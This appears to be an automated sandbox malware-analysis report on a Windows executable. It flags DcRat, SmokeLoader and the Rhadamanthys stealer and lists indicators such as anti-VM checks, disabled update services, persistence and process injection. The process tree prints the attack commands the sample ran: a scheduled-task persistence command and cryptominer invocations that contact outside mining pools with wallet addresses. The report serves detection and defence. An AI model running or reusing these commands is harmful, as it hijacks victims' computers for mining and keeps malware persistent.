Analysis
-
max time kernel
84s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
25-02-2023 17:13
Static task
static1
Behavioral task
behavioral1
Sample
f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe
Resource
win10v2004-20230221-en
General
-
Target
f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe
-
Size
252KB
-
MD5
4c321bea573c9d741d073aee4280af7d
-
SHA1
57f6df6d4b8b0c1e093c96aa88177582cd75b59a
-
SHA256
f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec
-
SHA512
eb06034eda2e0871b66f9f588c1243d52e74d8315a1a4cb245d41868ba2f13d7933a9c0114c635b73a7625c4c4e2e5ce1b9b41affb17a3cae34e7063ecd62aca
-
SSDEEP
3072:hAxkekLAFD6gK/32/dJhN3rvg/7/E8argeVTtXPpxBqRhDmlhHo:KOLTgK/4ogrxPXBq7mL
Malware Config
Signatures
-
DcRat 3 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exeschtasks.exef255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exepid process 4672 schtasks.exe 5040 schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe -
Detect rhadamanthys stealer shellcode 4 IoCs
Processes:
resource yara_rule behavioral1/memory/1396-410-0x00000000021B0000-0x00000000021CC000-memory.dmp family_rhadamanthys behavioral1/memory/1396-413-0x00000000021B0000-0x00000000021CC000-memory.dmp family_rhadamanthys behavioral1/memory/1396-414-0x00000000021D0000-0x00000000021EA000-memory.dmp family_rhadamanthys behavioral1/memory/1396-451-0x00000000021B0000-0x00000000021CC000-memory.dmp family_rhadamanthys -
Detects Smokeloader packer 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2304-134-0x00000000048D0000-0x00000000048D9000-memory.dmp family_smokeloader -
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
tmp40FB.tmpmomuxluwyocb.exeWinUpdate.exedescription pid process target process PID 3876 created 3164 3876 tmp40FB.tmpmomuxluwyocb.exe Explorer.EXE PID 3876 created 3164 3876 tmp40FB.tmpmomuxluwyocb.exe Explorer.EXE PID 3876 created 3164 3876 tmp40FB.tmpmomuxluwyocb.exe Explorer.EXE PID 3876 created 3164 3876 tmp40FB.tmpmomuxluwyocb.exe Explorer.EXE PID 3964 created 3164 3964 WinUpdate.exe Explorer.EXE -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
988.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 988.exe -
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule behavioral1/memory/216-175-0x0000000000100000-0x0000000000290000-memory.dmp net_reactor behavioral1/memory/3744-183-0x0000000000640000-0x0000000000BD2000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
988.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 988.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 988.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
988.exe282.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation 988.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation 282.exe -
Executes dropped EXE 8 IoCs
Processes:
ED43.exeF60E.exe282.exe988.exetmp40FB.tmpmomuxluwyocb.exetmp40FC.tmptucb6auv258.exeWinUpdate.exeInfrastructureprotection.exepid process 3948 ED43.exe 1396 F60E.exe 216 282.exe 3744 988.exe 3876 tmp40FB.tmpmomuxluwyocb.exe 4928 tmp40FC.tmptucb6auv258.exe 3964 WinUpdate.exe 4968 Infrastructureprotection.exe -
Obfuscated with Agile.Net obfuscator 8 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule behavioral1/memory/3744-189-0x0000000000640000-0x0000000000BD2000-memory.dmp agile_net C:\Users\Admin\AppData\Local\Temp\tmp40FC.tmptucb6auv258.exe agile_net C:\Users\Admin\AppData\Local\Temp\tmp40FC.tmptucb6auv258.exe agile_net C:\Users\Admin\AppData\Local\Temp\tmp40FC.tmptucb6auv258.exe agile_net behavioral1/memory/4928-479-0x0000000000140000-0x0000000000150000-memory.dmp agile_net behavioral1/memory/3744-480-0x0000000000640000-0x0000000000BD2000-memory.dmp agile_net C:\Users\Admin\AppData\Local\Infrastructure protection v3.39\Infrastructureprotection.exe agile_net C:\Users\Admin\AppData\Local\Infrastructure protection v3.39\Infrastructureprotection.exe agile_net -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\988.exe themida C:\Users\Admin\AppData\Local\Temp\988.exe themida behavioral1/memory/3744-189-0x0000000000640000-0x0000000000BD2000-memory.dmp themida behavioral1/memory/3744-480-0x0000000000640000-0x0000000000BD2000-memory.dmp themida -
Uses the VBS compiler for execution 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
tmp40FC.tmptucb6auv258.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Infrastructure protection v3.39 = "C:\\Users\\Admin\\AppData\\Local\\Infrastructure protection v3.39\\Infrastructureprotection.exe" tmp40FC.tmptucb6auv258.exe -
Processes:
988.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 988.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 99 ip-api.com 101 icanhazip.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
988.exeF60E.exepid process 3744 988.exe 1396 F60E.exe 1396 F60E.exe 1396 F60E.exe -
Drops file in Program Files directory 1 IoCs
Processes:
tmp40FB.tmpmomuxluwyocb.exedescription ioc process File created C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe tmp40FB.tmpmomuxluwyocb.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2264 sc.exe 3332 sc.exe 2556 sc.exe 1064 sc.exe 4948 sc.exe 4696 sc.exe 1216 sc.exe 1512 sc.exe 4992 sc.exe 1324 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4976 1396 WerFault.exe F60E.exe -
Checks SCSI registry key(s) 3 TTPs 8 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exeF60E.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 F60E.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID F60E.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F60E.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F60E.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F60E.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
tmp40FC.tmptucb6auv258.exeInfrastructureprotection.exe988.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString tmp40FC.tmptucb6auv258.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Infrastructureprotection.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Infrastructureprotection.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 988.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 988.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 988.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 988.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 tmp40FC.tmptucb6auv258.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4672 schtasks.exe 5040 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 916 timeout.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exeExplorer.EXEpid process 2304 f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe 2304 f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3164 Explorer.EXE -
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exeExplorer.EXEpid process 2304 f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Explorer.EXE988.exe282.exemsiexec.exeF60E.exetmp40FC.tmptucb6auv258.exepowershell.exepowershell.exedescription pid process Token: SeShutdownPrivilege 3164 Explorer.EXE Token: SeCreatePagefilePrivilege 3164 Explorer.EXE Token: SeShutdownPrivilege 3164 Explorer.EXE Token: SeCreatePagefilePrivilege 3164 Explorer.EXE Token: SeDebugPrivilege 3744 988.exe Token: SeDebugPrivilege 216 282.exe Token: SeSecurityPrivilege 4084 msiexec.exe Token: SeShutdownPrivilege 1396 F60E.exe Token: SeCreatePagefilePrivilege 1396 F60E.exe Token: SeShutdownPrivilege 3164 Explorer.EXE Token: SeCreatePagefilePrivilege 3164 Explorer.EXE Token: SeShutdownPrivilege 3164 Explorer.EXE Token: SeCreatePagefilePrivilege 3164 Explorer.EXE Token: SeShutdownPrivilege 3164 Explorer.EXE Token: SeCreatePagefilePrivilege 3164 Explorer.EXE Token: SeShutdownPrivilege 3164 Explorer.EXE Token: SeCreatePagefilePrivilege 3164 Explorer.EXE Token: SeDebugPrivilege 4928 tmp40FC.tmptucb6auv258.exe Token: SeDebugPrivilege 3048 powershell.exe Token: SeDebugPrivilege 4284 powershell.exe Token: SeIncreaseQuotaPrivilege 4284 powershell.exe Token: SeSecurityPrivilege 4284 powershell.exe Token: SeTakeOwnershipPrivilege 4284 powershell.exe Token: SeLoadDriverPrivilege 4284 powershell.exe Token: SeSystemProfilePrivilege 4284 powershell.exe Token: SeSystemtimePrivilege 4284 powershell.exe Token: SeProfSingleProcessPrivilege 4284 powershell.exe Token: SeIncBasePriorityPrivilege 4284 powershell.exe Token: SeCreatePagefilePrivilege 4284 powershell.exe Token: SeBackupPrivilege 4284 powershell.exe Token: SeRestorePrivilege 4284 powershell.exe Token: SeShutdownPrivilege 4284 powershell.exe Token: SeDebugPrivilege 4284 powershell.exe Token: SeSystemEnvironmentPrivilege 4284 powershell.exe Token: SeRemoteShutdownPrivilege 4284 powershell.exe Token: SeUndockPrivilege 4284 powershell.exe Token: SeManageVolumePrivilege 4284 powershell.exe Token: 33 4284 powershell.exe Token: 34 4284 powershell.exe Token: 35 4284 powershell.exe Token: 36 4284 powershell.exe Token: SeIncreaseQuotaPrivilege 4284 powershell.exe Token: SeSecurityPrivilege 4284 powershell.exe Token: SeTakeOwnershipPrivilege 4284 powershell.exe Token: SeLoadDriverPrivilege 4284 powershell.exe Token: SeSystemProfilePrivilege 4284 powershell.exe Token: SeSystemtimePrivilege 4284 powershell.exe Token: SeProfSingleProcessPrivilege 4284 powershell.exe Token: SeIncBasePriorityPrivilege 4284 powershell.exe Token: SeCreatePagefilePrivilege 4284 powershell.exe Token: SeBackupPrivilege 4284 powershell.exe Token: SeRestorePrivilege 4284 powershell.exe Token: SeShutdownPrivilege 4284 powershell.exe Token: SeDebugPrivilege 4284 powershell.exe Token: SeSystemEnvironmentPrivilege 4284 powershell.exe Token: SeRemoteShutdownPrivilege 4284 powershell.exe Token: SeUndockPrivilege 4284 powershell.exe Token: SeManageVolumePrivilege 4284 powershell.exe Token: 33 4284 powershell.exe Token: 34 4284 powershell.exe Token: 35 4284 powershell.exe Token: 36 4284 powershell.exe Token: SeIncreaseQuotaPrivilege 4284 powershell.exe Token: SeSecurityPrivilege 4284 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Explorer.EXE988.exetmp40FC.tmptucb6auv258.execmd.execmd.exedescription pid process target process PID 3164 wrote to memory of 3948 3164 Explorer.EXE ED43.exe PID 3164 wrote to memory of 3948 3164 Explorer.EXE ED43.exe PID 3164 wrote to memory of 1396 3164 Explorer.EXE F60E.exe PID 3164 wrote to memory of 1396 3164 Explorer.EXE F60E.exe PID 3164 wrote to memory of 1396 3164 Explorer.EXE F60E.exe PID 3164 wrote to memory of 216 3164 Explorer.EXE 282.exe PID 3164 wrote to memory of 216 3164 Explorer.EXE 282.exe PID 3164 wrote to memory of 3744 3164 Explorer.EXE 988.exe PID 3164 wrote to memory of 3744 3164 Explorer.EXE 988.exe PID 3164 wrote to memory of 3744 3164 Explorer.EXE 988.exe PID 3164 wrote to memory of 3676 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 3676 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 3676 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 3676 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 3408 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 3408 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 3408 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 3972 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 3972 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 3972 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 3972 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 2568 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 2568 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 2568 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 4984 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 4984 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 4984 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 4984 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 5012 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 5012 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 5012 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 5012 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 1176 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 1176 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 1176 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 1176 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 1680 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 1680 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 1680 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 4584 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 4584 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 4584 3164 Explorer.EXE explorer.exe PID 3164 wrote to memory of 4584 3164 Explorer.EXE explorer.exe PID 3744 wrote to memory of 3876 3744 988.exe tmp40FB.tmpmomuxluwyocb.exe PID 3744 wrote to memory of 3876 3744 988.exe tmp40FB.tmpmomuxluwyocb.exe PID 3744 wrote to memory of 4928 3744 988.exe tmp40FC.tmptucb6auv258.exe PID 3744 wrote to memory of 4928 3744 988.exe tmp40FC.tmptucb6auv258.exe PID 4928 wrote to memory of 4356 4928 tmp40FC.tmptucb6auv258.exe cmd.exe PID 4928 wrote to memory of 4356 4928 tmp40FC.tmptucb6auv258.exe cmd.exe PID 4356 wrote to memory of 916 4356 cmd.exe timeout.exe PID 4356 wrote to memory of 916 4356 cmd.exe timeout.exe PID 4920 wrote to memory of 4948 4920 cmd.exe sc.exe PID 4920 wrote to memory of 4948 4920 cmd.exe sc.exe PID 4920 wrote to memory of 2264 4920 cmd.exe sc.exe PID 4920 wrote to memory of 2264 4920 cmd.exe sc.exe PID 4920 wrote to memory of 4696 4920 cmd.exe sc.exe PID 4920 wrote to memory of 4696 4920 cmd.exe sc.exe PID 4920 wrote to memory of 1216 4920 cmd.exe sc.exe PID 4920 wrote to memory of 1216 4920 cmd.exe sc.exe PID 4920 wrote to memory of 1512 4920 cmd.exe sc.exe PID 4920 wrote to memory of 1512 4920 cmd.exe sc.exe PID 4920 wrote to memory of 1704 4920 cmd.exe reg.exe PID 4920 wrote to memory of 1704 4920 cmd.exe reg.exe PID 4920 wrote to memory of 1392 4920 cmd.exe reg.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe"C:\Users\Admin\AppData\Local\Temp\f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe"2⤵
- DcRat
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\ED43.exeC:\Users\Admin\AppData\Local\Temp\ED43.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\F60E.exeC:\Users\Admin\AppData\Local\Temp\F60E.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 9803⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\282.exeC:\Users\Admin\AppData\Local\Temp\282.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "URRERK" /tr "C:\ProgramData\AppVirtualBoxHelp\URRERK.exe"3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "URRERK" /tr "C:\ProgramData\AppVirtualBoxHelp\URRERK.exe"4⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a cryptonight-heavy --url=pool.hashvault.pro:80 -u 48KAmnwZUxBRbm4hKTpM1x6ucn4UqmdBwaojP5ka3kVWfpHEXRvLHq1NuE1s4R4yWRS663yNRe2EKZNXk96cJHL51BaXhga -R --variant=-1 --max-cpu-usage=40 --donate-level=1 -opencl --pass neweramining3⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.shaxta -p x -t 63⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵
-
C:\Users\Admin\AppData\Local\Temp\988.exeC:\Users\Admin\AppData\Local\Temp\988.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
